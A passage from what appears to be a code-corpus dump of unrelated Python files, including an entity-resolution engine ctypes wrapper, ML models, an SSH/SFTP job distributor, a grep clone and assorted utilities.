_endRecordId = self.prepareStringArgument(endRecordId)
_excludedEntities = self.prepareStringArgument(excludedEntities)
_requiredDsrcs = self.prepareStringArgument(requiredDsrcs)
resize_return_buffer(None, 65535)
responseBuf = c_char_p(None)
responseSize = c_size_t(0)
self._lib_handle.G2_findPathIncludingSourceByRecordID.restype = c_int
self._lib_handle.G2_findPathIncludingSourceByRecordID.argtypes = [c_char_p, c_char_p, c_char_p, c_char_p, c_int, c_char_p, c_char_p, c_int, POINTER(c_char_p), POINTER(c_size_t), self._resize_func_def]
ret_code = self._lib_handle.G2_findPathIncludingSourceByRecordID(_startDsrcCode,_startRecordId,_endDsrcCode,_endRecordId,maxDegree,
_excludedEntities,_requiredDsrcs,flags,
pointer(responseBuf),
pointer(responseSize),
self._resize_func)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
raise G2ModuleNotInitialized('G2Module has not been succesfully initialized')
return responseBuf.value.decode('utf-8')
def getEntityByEntityID(self,entityID):
# type: (int) -> str
""" Find the entity with the given ID
Args:
entityID: The entity ID you want returned. Typically referred to as
ENTITY_ID in JSON results.
Return:
str: JSON document with results
"""
resize_return_buffer(None, 65535)
responseBuf = c_char_p(None)
responseSize = c_size_t(0)
self._lib_handle.G2_getEntityByEntityID.argtypes = [c_longlong, POINTER(c_char_p), POINTER(c_size_t), self._resize_func_def]
ret_code = self._lib_handle.G2_getEntityByEntityID(entityID,
pointer(responseBuf),
pointer(responseSize),
self._resize_func)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
raise G2ModuleNotInitialized('G2Module has not been succesfully initialized')
return tls_var.buf.value.decode('utf-8')
def getEntityByEntityIDV2(self,entityID,flags):
# type: (int) -> str
""" Find the entity with the given ID
Args:
entityID: The entity ID you want returned. Typically referred to as
ENTITY_ID in JSON results.
flags: control flags.
Return:
str: JSON document with results
"""
resize_return_buffer(None, 65535)
responseBuf = c_char_p(None)
responseSize = c_size_t(0)
self._lib_handle.G2_getEntityByEntityID_V2.restype = c_int
self._lib_handle.G2_getEntityByEntityID_V2.argtypes = [c_longlong, c_int, POINTER(c_char_p), POINTER(c_size_t), self._resize_func_def]
ret_code = self._lib_handle.G2_getEntityByEntityID_V2(entityID,flags,
pointer(responseBuf),
pointer(responseSize),
self._resize_func)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
raise G2ModuleNotInitialized('G2Module has not been succesfully initialized')
return tls_var.buf.value.decode('utf-8')
def getEntityByRecordID(self,dsrcCode,recordId):
# type: (str,str) -> str
""" Get the entity containing the specified record
Args:
dataSourceCode: The data source for the observation.
recordID: The ID for the record
Return:
str: JSON document with results
"""
_dsrcCode = self.prepareStringArgument(dsrcCode)
_recordId = self.prepareStringArgument(recordId)
resize_return_buffer(None, 65535)
responseBuf = c_char_p(None)
responseSize = c_size_t(0)
self._lib_handle.G2_getEntityByRecordID.argtypes = [c_char_p, c_char_p, POINTER(c_char_p), POINTER(c_size_t), self._resize_func_def]
ret_code = self._lib_handle.G2_getEntityByRecordID(_dsrcCode,_recordId,
pointer(responseBuf),
pointer(responseSize),
self._resize_func)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
raise G2ModuleNotInitialized('G2Module has not been succesfully initialized')
return responseBuf.value.decode('utf-8')
def getEntityByRecordIDV2(self,dsrcCode,recordId,flags):
# type: (str,str) -> str
""" Get the entity containing the specified record
Args:
dataSourceCode: The data source for the observation.
recordID: The ID for the record
flags: control flags.
Return:
str: JSON document with results
"""
_dsrcCode = self.prepareStringArgument(dsrcCode)
_recordId = self.prepareStringArgument(recordId)
resize_return_buffer(None, 65535)
responseBuf = c_char_p(None)
responseSize = c_size_t(0)
self._lib_handle.G2_getEntityByRecordID_V2.restype = c_int
self._lib_handle.G2_getEntityByRecordID_V2.argtypes = [c_char_p, c_char_p, c_int, POINTER(c_char_p), POINTER(c_size_t), self._resize_func_def]
ret_code = self._lib_handle.G2_getEntityByRecordID_V2(_dsrcCode,_recordId,flags,
pointer(responseBuf),
pointer(responseSize),
self._resize_func)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
raise G2ModuleNotInitialized('G2Module has not been succesfully initialized')
return responseBuf.value.decode('utf-8')
def getRecord(self,dsrcCode,recordId):
# type: (str,str) -> str
""" Get the specified record
Args:
dataSourceCode: The data source for the observation.
recordID: The ID for the record
Return:
str: JSON document with results
"""
_dsrcCode = self.prepareStringArgument(dsrcCode)
_recordId = self.prepareStringArgument(recordId)
resize_return_buffer(None, 65535)
responseBuf = c_char_p(None)
responseSize = c_size_t(0)
self._lib_handle.G2_getRecord.argtypes = [c_char_p, c_char_p, POINTER(c_char_p), POINTER(c_size_t), self._resize_func_def]
ret_code = self._lib_handle.G2_getRecord(_dsrcCode,_recordId,
pointer(responseBuf),
pointer(responseSize),
self._resize_func)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
raise G2ModuleNotInitialized('G2Module has not been succesfully initialized')
return responseBuf.value.decode('utf-8')
def getRecordV2(self,dsrcCode,recordId,flags):
# type: (str,str) -> str
""" Get the specified record
Args:
dataSourceCode: The data source for the observation.
recordID: The ID for the record
flags: control flags.
Return:
str: JSON document with results
"""
_dsrcCode = self.prepareStringArgument(dsrcCode)
_recordId = self.prepareStringArgument(recordId)
resize_return_buffer(None, 65535)
responseBuf = c_char_p(None)
responseSize = c_size_t(0)
self._lib_handle.G2_getRecord_V2.restype = c_int
self._lib_handle.G2_getRecord_V2.argtypes = [c_char_p, c_char_p, c_int, POINTER(c_char_p), POINTER(c_size_t), self._resize_func_def]
ret_code = self._lib_handle.G2_getRecord_V2(_dsrcCode,_recordId,flags,
pointer(responseBuf),
pointer(responseSize),
self._resize_func)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
raise G2ModuleNotInitialized('G2Module has not been succesfully initialized')
return responseBuf.value.decode('utf-8')
def stats(self):
# type: () -> object
""" Retrieve the workload statistics for the current process.
Resets them after retrieved.
Args:
Return:
object: JSON document with statistics
"""
resize_return_buffer(None, 65535)
responseBuf = c_char_p(None)
responseSize = c_size_t(0)
self._lib_handle.G2_stats.argtypes = [POINTER(c_char_p), POINTER(c_size_t), self._resize_func_def]
ret_code = self._lib_handle.G2_stats(pointer(responseBuf),
pointer(responseSize),
self._resize_func)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
raise G2ModuleNotInitialized('G2Module has not been succesfully initialized')
return responseBuf.value.decode('utf-8')
def exportConfig(self):
# type: () -> object
""" Retrieve the G2 engine configuration
Args:
Return:
object: JSON document with G2 engine configuration
"""
resize_return_buffer(None, 65535)
responseBuf = c_char_p(None)
responseSize = c_size_t(0)
self._lib_handle.G2_exportConfig.argtypes = [POINTER(c_char_p), POINTER(c_size_t), self._resize_func_def]
ret_code = self._lib_handle.G2_exportConfig(pointer(responseBuf),
pointer(responseSize),
self._resize_func)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
raise G2ModuleNotInitialized('G2Module has not been succesfully initialized')
elif ret_code < 0:
raise G2ModuleGenericException("ERROR_CODE: " + str(ret_code))
return responseBuf.value.decode('utf-8')
def getActiveConfigID(self):
# type: () -> object
""" Retrieve the active config ID for the G2 engine
Args:
Return:
object: The numeric active config ID
"""
configID = c_longlong(0)
self._lib_handle.G2_getActiveConfigID.argtypes = [POINTER(c_longlong)]
ret_code = self._lib_handle.G2_getActiveConfigID(configID)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
raise G2ModuleNotInitialized('G2Module has not been succesfully initialized')
elif ret_code < 0:
raise G2ModuleGenericException("ERROR_CODE: " + str(ret_code))
return configID.value
def getRepositoryLastModifiedTime(self):
# type: () -> object
""" Retrieve the last modified time stamp of the entity store repository
Args:
Return:
object: The last modified time stamp, as a numeric integer
"""
lastModifiedTimeStamp = c_longlong(0)
self._lib_handle.G2_getRepositoryLastModifiedTime.argtypes = [POINTER(c_longlong)]
ret_code = self._lib_handle.G2_getRepositoryLastModifiedTime(lastModifiedTimeStamp)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
raise G2ModuleNotInitialized('G2Module has not been succesfully initialized')
elif ret_code < 0:
raise G2ModuleGenericException("ERROR_CODE: " + str(ret_code))
return lastModifiedTimeStamp.value
def purgeRepository(self, reset_resolver_=True):
# type: (bool) -> None
""" Purges the G2 repository
Args:
reset_resolver: Re-initializes the engine. Should be left True.
Return:
None
"""
resize_return_buffer(None, 65535)
retval = self._lib_handle.G2_purgeRepository()
if retval == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif retval == -1:
raise G2ModuleNotInitialized('G2Module has not been succesfully initialized')
if reset_resolver_ == True:
self.restart()
def restart(self):
""" Internal function """
self.destroy()
self.init()
def destroy(self):
""" Uninitializes the engine
This should be done once per process after init(...) is called.
After it is called the engine will no longer function.
Args:
Return:
None
"""
self._lib_handle.G2_destroy()
|
python
|
import torch.nn as nn
import torch.nn.functional as F
class CNN(nn.Module):
# https://github.com/rensutheart/PyTorch-Deep-Learning-Tutorials/blob/master/part3_MNIST.py
def __init__(self, n_classes):
super(CNN, self).__init__()
# define all the components that will be used in the NN (these can be reused)
self.conv1 = nn.Conv2d(1, 10, kernel_size=5, padding=2) # 1 input feature, 10 output filters
self.conv2 = nn.Conv2d(10, 20, kernel_size=5, padding=2) # 10 input filters, 20 output filters
self.mp = nn.MaxPool2d(2)
self.drop2D = nn.Dropout2d(p=0.25)
self.fc1 = nn.Linear(500, 90)
self.fc2 = nn.Linear(90, n_classes)
def forward(self, x):
# define the acutal network
in_size = x.size(0) # this is the batch size
# you can chain function together to form the layers
x = F.relu(self.mp(self.conv1(x)))
x = F.relu(self.mp(self.conv2(x)))
# x = self.drop2D(x)
x = x.view(in_size, -1) # flatten data, -1 is inferred from the other dimensions (which is 320 here)
x = F.relu(self.fc1(x))
x = self.fc2(x)
return F.log_softmax(x, dim=1)
def num_flat_features(self, x):
size = x.size()[1:] # all dimensions except the batch dimension
num_features = 1
for s in size:
num_features *= s
return num_features
|
python
|
# Copyright 2014 - Red Hat Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from barbicanclient import client as barbicanclient
from barbicanclient.common import auth as barbicanauth
from oslo.config import cfg
from solum.openstack.common import importutils
class BarbicanClient(object):
"""Barbican client wrapper so we can encapsulate logic in one place."""
def __init__(self, insecure=False):
self.insecure = insecure
self._admin_client = None
@property
def admin_client(self):
if not self._admin_client:
# Create connection to API
self._admin_client = self._barbican_admin_init()
return self._admin_client
def _barbican_admin_init(self):
# Import auth_token to have keystone_authtoken settings setup.
importutils.import_module('keystoneclient.middleware.auth_token')
keystone = barbicanauth.KeystoneAuthV2(
auth_url=cfg.CONF.keystone_authtoken.auth_uri,
username=cfg.CONF.keystone_authtoken.admin_user,
password=cfg.CONF.keystone_authtoken.admin_password,
tenant_name=cfg.CONF.keystone_authtoken.admin_tenant_name)
return barbicanclient.Client(auth_plugin=keystone,
insecure=self.insecure)
|
python
|
from .R2 import R2
|
python
|
import os
def handle_headers(frame, request, response):
# Send a 103 response.
resource_url = request.GET.first(b"resource-url").decode()
link_header_value = "<{}>; rel=preload; as=script".format(resource_url)
early_hints = [
(b":status", b"103"),
(b"link", link_header_value),
]
early_hints_policy = request.GET.first(b"early-hints-policy").decode()
# In this test handler "allowed" or "absent" are only valid policies because
# csp-document-disallow.html always sets CSP to disallow the preload.
# "disallowed" makes no observable changes in the test. Note that
# csp-basic.html covers disallowing preloads in Early Hints.
assert early_hints_policy == "allowed" or early_hints_policy == "absent"
if early_hints_policy == "allowed":
resource_origin = request.GET.first(b"resource-origin").decode()
csp_value = "script-src 'self' 'unsafe-inline' {}".format(resource_origin)
early_hints.append((b"content-security-policy", csp_value))
response.writer.write_raw_header_frame(headers=early_hints,
end_headers=True)
# Send the final response header.
response.status = 200
response.headers["content-type"] = "text/html"
response.write_status_headers()
def main(request, response):
current_dir = os.path.dirname(os.path.realpath(__file__))
file_path = os.path.join(current_dir, "csp-document-disallow.html")
with open(file_path, "r") as f:
test_content = f.read()
response.writer.write_data(item=test_content, last=True)
|
python
|
# Copyright 2018 The Cirq Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""An optimization pass that combines adjacent single-qubit rotations."""
from typing import Iterable, List, Tuple, cast, Optional
import numpy as np
from cirq import ops, extension
from cirq.circuits.circuit import Circuit
from cirq.circuits.optimization_pass import (
PointOptimizationSummary,
PointOptimizer,
)
class MergeSingleQubitGates(PointOptimizer):
"""Combines adjacent constant single-qubit rotations into
SingleQubitMatrixGates.
"""
def __init__(self,
extensions: extension.Extensions = None) -> None:
super().__init__()
self.extensions = extensions or extension.Extensions()
def optimization_at(self,
circuit: Circuit,
index: int,
op: ops.Operation
) -> Optional[PointOptimizationSummary]:
if len(op.qubits) != 1:
return None
indices, gates = self._scan_single_qubit_ops(circuit, index,
op.qubits[0])
if not gates:
return None
# Replace the gates with a max-2-op XY + Z construction.
operations = self._merge_rotations(op.qubits[0], gates)
return PointOptimizationSummary(
clear_span=max(indices) + 1 - index,
clear_qubits=op.qubits,
new_operations=operations)
def _scan_single_qubit_ops(self,
circuit: Circuit,
index: Optional[int],
qubit: ops.QubitId
) -> Tuple[List[int], List[ops.KnownMatrix]]:
operations = [] # type: List[ops.KnownMatrix]
indices = [] # type: List[int]
while index is not None:
op = cast(ops.Operation, circuit.operation_at(qubit, index))
if len(op.qubits) != 1:
break
operation = self.extensions.try_cast(ops.KnownMatrix, op)
if operation is None:
break
indices.append(index)
operations.append(operation)
index = circuit.next_moment_operating_on([qubit], index + 1)
return indices, operations
def _merge_rotations(self,
qubit: ops.QubitId,
operations: Iterable[ops.KnownMatrix]
) -> List[ops.Operation]:
matrix = np.eye(2, dtype=np.complex128)
for op in operations:
matrix = np.dot(op.matrix(), matrix)
return [ops.SingleQubitMatrixGate(matrix)(qubit)]
|
python
|
from rest_framework import serializers
from .models import Product
class ProductSerializer(serializers.ModelSerializer):
# Get the image url by serializing `ImageField`
image = serializers.ImageField(max_length=None, allow_empty_file=False, allow_null=True, required=False)
class Meta:
# Model to be serialized
model = Product
# Fields to be serialized
fields = ("id", "name", "description", "price", "stock", "image", "category")
|
python
|
import os
import platform
import time
import sys
import importlib
import glob
import subprocess
import selectors
import multiprocess
import paramiko
from comm.platform import linux_win, run_cmd_list, run_cmd
from compute import Config_ini
from compute.log import Log
def get_local_path():
"""
:return:Get the absolute path of the calling package
"""
_path = os.getcwd()
return _path
def get_transfer_local_path():
"""
:return:Get the absolute path of the package
"""
_path = os.path.dirname(os.path.dirname(__file__))
return _path
def get_algo_name():
"""
:return:Get the name of the currently running algorithm
"""
alg_name = Config_ini.alg_name
return alg_name
def get_gen_number():
"""
:return:Get the algebra of NAS iterations
"""
max_gen = Config_ini.max_gen
return int(max_gen)
def get_pop_siz():
"""
:return:Get population size
"""
pop_size = Config_ini.pop_size
return int(pop_size)
def get_exe_path():
exe_path = Config_ini.exe_path
return exe_path
def get_algo_local_dir():
"""
:return:Get the corresponding folder under the running algorithm runtime
"""
top_dir = get_local_path()
alg_name = Config_ini.alg_name
local_dir = os.path.join(top_dir, 'runtime', alg_name)
if not os.path.exists(os.path.dirname(local_dir)):
os.mkdir(os.path.dirname(local_dir))
return local_dir
def get_population_dir():
"""
:return:Get the populations folder in the corresponding folder under the running algorithm runtime and create it
"""
pop_dir = os.path.join(get_algo_local_dir(), 'populations')
if not os.path.exists(pop_dir):
os.makedirs(pop_dir)
return pop_dir
def get_top_dest_dir():
"""
:return:Get the path of the algorithm under the server root path
"""
alg_name = Config_ini.alg_name
tdd = os.path.join('~', alg_name)
return tdd
def get_train_ini_path():
"""
:return:Get the absolute path of train.ini
"""
return os.path.join(get_local_path(), 'train', 'train.ini')
def get_global_ini_path():
"""
:return:Get the absolute path of global.ini
"""
return os.path.join(get_local_path(), 'global.ini')
def exec_cmd_remote(_cmd, need_response=True):
p = subprocess.Popen(_cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout_str = None
stderr_str = None
if need_response:
sel = selectors.DefaultSelector()
sel.register(p.stdout, selectors.EVENT_READ)
sel.register(p.stderr, selectors.EVENT_READ)
stdout_ = None
stderr_ = None
for key, _ in sel.select():
data = key.fileobj.readlines()
if key.fileobj is p.stdout:
stdout_ = data
else:
stderr_ = data
if stdout_ is not None and len(stdout_) > 0:
stdout_str = ''.join([_.decode('utf-8') for _ in stdout_])
if stderr_ is not None and len(stderr_) > 0:
stderr_str = ''.join([_.decode('utf-8') for _ in stderr_])
return stdout_str, stderr_str
def detect_file_exit(ssh_name, ssh_pwd, ip, port, file_name):
transport = paramiko.Transport((ip, port))
transport.connect(username=ssh_name, password=ssh_pwd)
sftp = paramiko.SFTPClient.from_transport(transport)
sftp.chdir('.')
try:
sftp.stat(file_name)
return True
except:
return False
def init_work_dir(ssh_name, ssh_password, ip, port):
Log.debug('Start to init the work directory in each worker')
alg_name = get_algo_name()
cmd_ = list()
if detect_file_exit(ssh_name, ssh_password, ip, port, alg_name):
system_ver = linux_win(ssh_name, ssh_password, ip, port)
time_str = time.strftime('%Y%m%d%H%M%S', time.localtime(time.time()))
if system_ver == 'linux':
_bak_cmd = 'mv \'%s\' \'%s_bak_%s\'' % (alg_name, alg_name, time_str)
cmd_.append(_bak_cmd)
elif system_ver == 'windows':
_bak_cmd = 'ren %s %s_bak_%s' % (alg_name, alg_name, time_str)
cmd_.append(_bak_cmd)
else:
Log.debug('Current system %s is not windows or linux!' % ip)
_mk_cmd = 'mkdir %s' % alg_name
cmd_.append(_mk_cmd)
for cmd in cmd_:
Log.info('Execute the cmd: %s' % cmd)
stderr_ = run_cmd_list(ssh_name, ssh_password, ip, port, cmd_)
if stderr_:
Log.debug('Stderr: %s' % stderr_)
def init_work_dir_on_all_workers():
Log.info('Init the work directories on each worker')
gpu_info = Config_ini.gpu_info
ls_dataset = ['MNIST', 'CIFAR10', 'CIFAR100']
for sec in gpu_info.keys():
worker_name = gpu_info[sec]['worker_name']
worker_ip = gpu_info[sec]['worker_ip']
ssh_name = gpu_info[sec]['ssh_name']
ssh_password = gpu_info[sec]['ssh_password']
port = gpu_info[sec]['port']
init_work_dir(ssh_name, ssh_password, worker_ip, port)
transfer_training_files(ssh_name, ssh_password, worker_ip, port)
if Config_ini.dataset not in ls_dataset:
transfer_dataset_image(ssh_name, ssh_password, worker_ip, port, Config_ini.data_dir)
def makedirs(sftp, dir_path):
Log.info('Execute the operation: mkdir %s' % dir_path)
try:
sftp.stat(dir_path)
except:
sftp.mkdir(dir_path)
def exec_python(ssh_name, ssh_pwd, ip, port, py_file, args, python_exec):
top_dir = get_top_dest_dir()
py_file = os.path.join(top_dir, py_file).replace('~', '.').replace('\\', '/')
# compute.log输出
Log.info('Execute the remote python file [(%s)%s]' % (ip, py_file))
_exec_cmd = '%s %s %s' % (python_exec, py_file,
' '.join([' '.join([k, v]) for k, v in
args.items()]))
Log.info('Execute the cmd: %s' % _exec_cmd)
p = multiprocess.Process(target=run_cmd, args=(ssh_name, ssh_pwd, ip, port, _exec_cmd))
p.start()
def transfer_file_relative(ssh_name, ssh_pwd, ip, port, source, dest):
"""Use relative path to transfer file, both source and dest are relative path
"""
top_dir = get_top_dest_dir()
full_path_dest = os.path.join(top_dir, dest).replace('~', '.')
full_path_dest = full_path_dest.replace('\\', '/')
full_path_source = os.path.join(get_local_path(), source).replace('\\', '/')
transport = paramiko.Transport((ip, port))
transport.connect(username=ssh_name, password=ssh_pwd)
sftp = paramiko.SFTPClient.from_transport(transport)
# full_path_source = full_path_source.replace(' ','\\\\ ')
makedirs(sftp, os.path.dirname(full_path_dest))
try:
Log.info('Execute the operation: put %s to %s' % (full_path_source, full_path_dest))
sftp.put(full_path_source, full_path_dest)
Log.info('Transfer file successfully...')
except Exception as e:
Log.info('Transfer file failed....')
Log.debug(e)
sftp.close()
def sftp_makedirs(sftp_sess, dir_path):
cwd_bak = sftp_sess.getcwd()
dir_split = [dir_path]
while os.path.dirname(dir_path) != '' and os.path.dirname(dir_path) != '/':
dir_split = [os.path.dirname(dir_path)] + dir_split
dir_path = dir_split[0]
for dir_ in dir_split:
try:
# exists
sftp_sess.stat(dir_)
except:
# absent
sftp_sess.mkdir(dir_)
sftp_sess.chdir(cwd_bak)
def sftp_transfer(sftp_sess, src_path, dst_path):
sftp_makedirs(sftp_sess, os.path.dirname(dst_path))
sftp_sess.put(src_path, dst_path)
def transfer_training_files(ssh_name, ssh_password, worker_ip, port):
training_file_dep = [(v, v) for _, v in get_training_file_dependences().items()]
transport = paramiko.Transport((worker_ip, port))
transport.connect(username=ssh_name, password=ssh_password)
sftp = paramiko.SFTPClient.from_transport(transport)
sftp.chdir('.')
root_dir = sftp.getcwd()
sub_file = os.path.dirname(os.path.dirname(__file__))
sub_file = os.path.join(sub_file, 'runtime/README.MD').replace('\\', '/')
training_file_dep = training_file_dep + [(sub_file, 'runtime/README.MD')]
top_dir = get_top_dest_dir()
for src, dst in training_file_dep:
full_path_source = os.path.join(get_transfer_local_path(), src)
full_path_dest = os.path.join(top_dir, dst).replace('~', root_dir).replace('\\', '/')
if full_path_dest.endswith('training.py'):
full_path_dest = os.path.join(os.path.dirname(os.path.dirname(full_path_dest)), 'training.py').replace('\\',
'/')
Log.debug('Start to sftp: `%s` ==> `%s`' % (full_path_source, full_path_dest))
sftp_transfer(sftp, full_path_source, full_path_dest)
transport.close()
def transfer_dataset_image(ssh_name, ssh_password, worker_ip, port, source):
transport = paramiko.Transport((worker_ip, port))
transport.connect(username=ssh_name, password=ssh_password)
sftp = paramiko.SFTPClient.from_transport(transport)
sftp.chdir('.')
root_dir = sftp.getcwd()
source = source.replace('\\', '/')
dset_name = source.split('/')[-1]
try:
sftp.stat(dset_name)
except:
sftp.mkdir(dset_name)
for root, subdir, files in os.walk(source):
for dir in subdir:
r_d = source.split("/")
local_subdir = os.path.join(root, dir).replace('\\', '/')
l_d = local_subdir.split("/")
r_m = l_d[len(r_d):]
r_m = "/".join(r_m)
remote_subdir = os.path.join(dset_name, r_m).replace('\\', '/')
try:
sftp.stat(remote_subdir)
except:
sftp.mkdir(remote_subdir)
for file in files:
local_dir_path = os.path.join(root, file).replace('\\', '/')
l_d_p = local_dir_path.split("/")
r_d_p = l_d_p[len(r_d):]
r_d_p = "/".join(r_d_p)
remote_dir_path = os.path.join(dset_name, r_d_p).replace('\\', '/')
Log.info('Start to sftp dataset: `%s` ==> `%s`' %
(local_dir_path,
os.path.join(root_dir, remote_dir_path).replace('\\', '/')))
try:
sftp.stat(remote_dir_path)
except:
sftp.put(local_dir_path, remote_dir_path)
transport.close()
def get_dependences_by_module_name(module_name):
import multiprocessing
with multiprocessing.Pool(1) as p:
res = p.map(__help_func, (module_name,))[0]
return res
def get_training_file_dependences():
f_list = list(filter(lambda x: not x.startswith(os.path.join(get_transfer_local_path(), 'runtime')) and
not x.startswith(os.path.join(get_transfer_local_path(), 'venv')) and
not x.startswith(os.path.join(get_transfer_local_path(), '__pycache__')),
glob.iglob(os.path.join(get_transfer_local_path(), '**/*.py'),
recursive=True))) + \
list(filter(lambda x: not x.startswith(os.path.join(get_transfer_local_path(), 'runtime')) and
not x.startswith(os.path.join(get_transfer_local_path(), '__pycache__')),
glob.iglob(os.path.join(get_transfer_local_path(), '**/*.ini'),
recursive=True)))
if platform.system() == 'Windows':
res = {
_.replace(get_transfer_local_path() + '\\', ''):
_.replace(get_transfer_local_path() + '\\', '')
for _ in f_list}
else:
res = {
_.replace(get_transfer_local_path() + '/', ''):
_.replace(get_transfer_local_path() + '/', '')
for _ in f_list}
return res
def get_all_edl_modules():
"""Get name and relative path of the modules in edl project
"""
res = {}
for k, v in sys.modules.items():
if hasattr(v, '__file__'):
if v is not None:
try:
if v.__file__ and 'site-packages' in getattr(v, '__file__'):
pass
else:
project_dir = get_local_path()
if v.__file__ and v.__file__.startswith(project_dir):
res[k] = v.__file__.replace(project_dir + '/', '')
except Exception:
import pdb
pdb.set_trace()
else:
pass
return res
def __help_func(module_name):
importlib.import_module('.', module_name)
res = get_all_edl_modules()
return res
if __name__ == '__main__':
print(get_training_file_dependences())
|
python
|
# coding: utf-8
from django.core.management.base import BaseCommand, CommandError
from ...models import Account, Tweet
class Command(BaseCommand):
"""Generates the HTML version of all the Tweets.
Does this by re-saving every Tweet, one-by-one.
For one account:
./manage.py generate_tweet_html --account=philgyford
For all accounts:
./manage.py generate_tweet_html
"""
help = "Generates the HTML version of all the Tweets."
def add_arguments(self, parser):
parser.add_argument(
"--account",
action="store",
default=False,
help="Only generate for one Twitter account.",
)
def handle(self, *args, **options):
tweets = Tweet.objects.all()
# If a screen name is provided, only get the Tweets for that:
if options["account"]:
screen_name = options["account"]
try:
Account.objects.get(user__screen_name=screen_name)
except Account.DoesNotExist:
raise CommandError(
"There's no Account with a screen name of '%s'" % screen_name
)
tweets = tweets.filter(user__screen_name=screen_name)
for tweet in tweets:
tweet.save()
if options.get("verbosity", 1) > 0:
self.stdout.write("Generated HTML for %d Tweets" % tweets.count())
|
python
|
import pytest
@pytest.fixture
def supply_AA_BB_CC():
aa=25
bb =35
cc=45
return [aa,bb,cc]
|
python
|
#!/usr/pkg/bin/python2.7
from __future__ import print_function
# grep: serach for string patterns in files
import sys
import os
import argparse
import re
def _fg(file, pattern, ops):
with open(file, 'r') as f:
text = f.readlines()
z = len(text)
for i in range(z):
line = text[i]
result = pattern.match(line.strip())
if not result: result = (ops.pattern in line.strip())
if result:
if ops.A:
if i < ops.A_num:
j = i
else:
j = ops.A_num
print(''.join(text[i-j:i]), end='')
print(line, end='')
if ops.B:
if i+ops.B_num > z:
j = z-i
else:
j = ops.B_num
print(''.join(text[i+1:i+j+1]), end='')
def _grep(args):
pattern = re.compile(args.pattern if not args.i else args.pattern.lower())
for file in args.files:
_fg(file, pattern, args)
def main(argv):
# Initialize parser #
parser = argparse.ArgumentParser()
# Add options #
parser.add_argument('-A', dest='A_num', action='store', type=int,
help='Prints traliing lines for each match')
parser.add_argument('-B', dest='B_num', action='store', type=int,
help='Prints leading lines for each match')
parser.add_argument('-i', action='store_true',
help='Makes pattern case insensitive')
parser.add_argument('files', nargs=argparse.REMAINDER)
argv = parser.parse_args()
argv.A = False
argv.B = False
if argv.A_num:
argv.A = True
if argv.B_num:
argv.B = True
if len(argv.files) < 2:
parser.print_help()
return
argv.pattern = argv.files[0]
argv.files = argv.files[1:]
_grep(args=argv)
if __name__ == '__main__':
main(sys.argv)
|
python
|
from collections import defaultdict
import dill
import numpy as np
import time
import torch.multiprocessing as mp
mp.set_sharing_strategy('file_system')
from starter_code.infrastructure.log import renderfn
from starter_code.sampler.hierarchy_utils import flatten_rewards, build_interval_tree, set_transformation_ids, get_subreturns_matrix, redistribute_rewards_recursive, visualize_episode_data, visualize_hrl_finish_episode
from starter_code.interfaces.interfaces import StepOutput, PolicyTransformParams
from starter_code.organism.domain_specific import preprocess_state_before_forward
def collect_train_samples_serial(epoch, max_steps, objects, pid=0, queue=None):
"""
Purpose: collect rollouts for max_steps steps
Return: stats_collector
"""
env = objects['env']
stats_collector = objects['stats_collector_builder']()
sampler = objects['sampler']
max_episode_length = objects['max_episode_length']
seed = int(1e6)*objects['seed'] + pid
env.seed(seed)
start = time.time()
num_steps = 0
while num_steps < max_steps:
max_steps_this_episode = min(max_steps - num_steps, max_episode_length)
episode_data = sampler.sample_episode(env=env, max_steps_this_episode=max_steps_this_episode)
stats_collector.append(episode_data)
num_steps += len(episode_data) # this is actually the number of high level timesteps
end = time.time()
objects['printer']('PID: {} Time to collect samples: {}'.format(pid, end-start))
if queue is not None:
queue.put([pid, stats_collector.data])
else:
return stats_collector
def collect_train_samples_parallel(epoch, max_steps, objects, num_workers=10):
"""
Purpose: collect rollouts for max_steps steps using num_workers workers
Return: stats_collector
"""
num_steps_per_worker = max_steps // num_workers
